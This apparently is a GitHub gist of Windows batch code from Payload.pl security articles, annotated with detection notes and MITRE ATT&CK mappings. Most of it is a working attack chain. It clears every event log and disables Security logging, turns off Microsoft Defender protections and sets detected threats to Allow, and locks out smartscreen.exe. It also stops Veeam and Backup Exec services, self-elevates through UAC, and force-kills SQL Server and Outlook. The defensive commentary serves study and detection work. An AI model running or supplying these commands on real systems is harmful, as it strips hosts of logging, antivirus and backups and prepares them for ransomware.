@tomaszklim
Last active June 18, 2021 17:23
Source code for articles on Payload.pl
REM Code from https://payload.pl/jak-prosto-wirusy-rozbrajaja-zabezpieczenia-windows-10/
REM Anti-forensics step: lists every event log channel with wevtutil el and
REM clears each one with wevtutil cl.
REM Defender view: clearing the Security log records event 1102 in that log, and
REM clearing other channels records event 104 in the System log. Events that
REM were forwarded off-host before this ran are not affected by the clear.
REM Maps to MITRE ATT+CK T1070.001 - Clear Windows Event Logs.
for /f “delims=” %%I in (‘wevtutil el’) do (wevtutil cl “%%I”)
REM Disables the Security channel so later audit events are not recorded.
REM Maps to MITRE ATT+CK T1562.002 - Disable Windows Event Logging.
REM A Security log that is disabled or suddenly silent on a managed host is
REM worth alerting on by itself.
wevtutil sl Security /e:false
REM Code from https://payload.pl/windows-defender/
REM Every line in this section weakens Microsoft Defender Antivirus through the
REM Add-MpPreference and Set-MpPreference cmdlets. Each call starts its own
REM powershell.exe process, so the full list is visible in process creation logs.
REM Defender view:
REM  - Maps to MITRE ATT+CK T1562.001 - Disable or Modify Tools.
REM  - The Microsoft-Windows-Windows Defender/Operational log records event 5001
REM    when real-time protection is turned off and event 5007 when a setting is
REM    changed.
REM  - Tamper Protection is designed to reject changes like these for the
REM    settings it covers. Verify it is enabled fleet-wide.
REM  - Get-MpPreference and Get-MpComputerStatus show the resulting state and
REM    can be compared against a known-good baseline.
REM Excludes every file with the .exe extension from scanning.
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
REM Turns off Controlled Folder Access, the feature that restricts which
REM applications may write to protected folders.
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
REM Turns off detection of potentially unwanted applications.
powershell.exe -command "Set-MpPreference -PUAProtection disable"
REM Turns off real-time protection, behavior monitoring, block at first sight
REM and scanning of downloaded files and attachments, in that order.
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
REM Privacy mode is a legacy setting that limits who can view threat history.
REM NOTE(review): effect on current Windows builds not confirmed from this page.
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
REM Suppresses the signature update that would otherwise run at startup when
REM no antimalware engine is present.
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
REM Turns off scanning inside archives, the network intrusion prevention
REM component and script scanning, in that order.
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
REM Cuts the host off from cloud protection: value 2 means never send samples,
REM and MAPSReporting 0 disables cloud reporting.
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
REM Sets the default action for all four threat severities to 6, which is
REM Allow, so a detected threat is left in place instead of being remediated.
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
REM Schedule day 8 means the scheduled scan never runs.
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
REM Code from https://payload.pl/smartscreen/
REM Makes the SmartScreen binary unusable by changing its ownership and ACL
REM instead of deleting it.
REM Defender view:
REM  - Maps to MITRE ATT+CK T1562.001 - Disable or Modify Tools.
REM  - Files under System32 are normally owned by TrustedInstaller, so a change
REM    of owner or ACL on a system binary is anomalous.
REM  - Process creation logging with command lines shows takeown.exe and
REM    icacls.exe pointed at a System32 executable. Object access auditing, if
REM    enabled for that path, records the permission change itself.
REM Gives ownership of the file to the Administrators group.
takeown /f "%systemroot%\System32\smartscreen.exe" /a
REM Resets the ACL to inherited defaults so the following edit can be applied.
icacls "%systemroot%\System32\smartscreen.exe" /reset
REM Force-terminates the running SmartScreen process.
taskkill /im smartscreen.exe /f
REM Removes inheritance and removes the entries for Administrators
REM S-1-5-32-544, Authenticated Users S-1-5-11, Users S-1-5-32-545 and
REM Local System S-1-5-18. Presumably this leaves no principal able to
REM execute the file - confirm against the resulting ACL.
icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
REM Code from https://payload.pl/jak-popsuc-backup-windows/
REM Stops backup product services by name. Service names starting with Veeam
REM belong to Veeam products. The second list further down covers Backup Exec.
REM Presumably the goal is that no backup job runs and no agent holds files
REM open - inferred from the article slug, not stated on this page.
REM Defender view:
REM  - Maps to MITRE ATT+CK T1489 - Service Stop.
REM  - Each call shows up as net.exe with a stop argument in process creation
REM    logs, and the Service Control Manager writes the state change to the
REM    System log.
REM  - A burst of stop requests against backup services outside a maintenance
REM    window, or a gap in completed backup jobs, is a high-value alert.
REM  - Offline or immutable backup copies and separate administrative accounts
REM    for backup infrastructure limit the impact of this step.
net stop VeeamBackupSvc
net stop VeeamBrokerSvc
net stop VeeamCatalogSvc
net stop VeeamCloudSvc
net stop VeeamDeploymentService
net stop VeeamDeploySvc
net stop VeeamEnterpriseManagerSvc
net stop VeeamHvIntegrationSvc
net stop VeeamMountSvc
net stop VeeamNFSSvc
net stop VeeamRESTSvc
net stop VeeamTransportSvc
REM Code from https://payload.pl/jak-popsuc-backup-windows/
REM Same technique applied to the Backup Exec services.
net stop BackupExecAgentAccelerator
net stop BackupExecAgentBrowser
net stop BackupExecDeviceMediaService
net stop BackupExecJobEngine
net stop BackupExecManagementService
net stop BackupExecRPCService
net stop BackupExecVSSProvider
REM Code from https://payload.pl/wirusy-i-uac/
REM Self-elevation idiom: checks for administrative rights and, if they are
REM missing, relaunches this script through the runas verb. This raises the
REM standard UAC consent prompt. It is not a UAC bypass - elevation only
REM happens if the user approves the prompt or supplies admin credentials.
REM Defender view:
REM  - The observable sequence is a script host process running a .vbs file
REM    from the user's temp directory, followed by an elevated cmd.exe.
REM  - Running users as standard users, keeping UAC at its strictest setting
REM    and blocking script execution from temp directories with an application
REM    control policy all reduce the chance that the prompt is approved or
REM    that the helper script runs at all.
REM Admin probe: runs cacls against the SYSTEM registry hive file and discards
REM all output. Only the exit code is used by the check below.
>nul 2>&1 "%systemroot%\System32\cacls.exe" "%systemroot%\System32\config\system"
REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
REM Writes a two-line VBScript helper to a fixed file name in the temp
REM directory, runs it, deletes it, then exits this non-elevated instance.
REM The helper calls ShellExecute with the runas verb on cmd.exe.
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params = %*:"="
echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:gotAdmin
REM Elevated path: saves the current directory, switches to the directory that
REM holds this script, then prints the account name and waits for a key press.
pushd "%CD%"
CD /D "%~dp0"
echo "Now have elevated permissions."
whoami
pause
REM Code from https://payload.pl/jak-prosto-wirusy-rozbrajaja-zabezpieczenia-windows-10/
REM Force-terminates the SQL Server engine and Outlook by image name.
REM Presumably this releases their open handles on database and mailbox files
REM - inferred, the page does not state the purpose.
REM Defender view:
REM  - Maps to MITRE ATT+CK T1489 - Service Stop.
REM  - A forced kill of sqlservr.exe is abnormal on a production host. The
REM    Service Control Manager logs the unexpected termination in the System
REM    log, and process creation logs show taskkill.exe with the /f switch.
taskkill /im sqlservr.exe /f
taskkill /im outlook.exe /f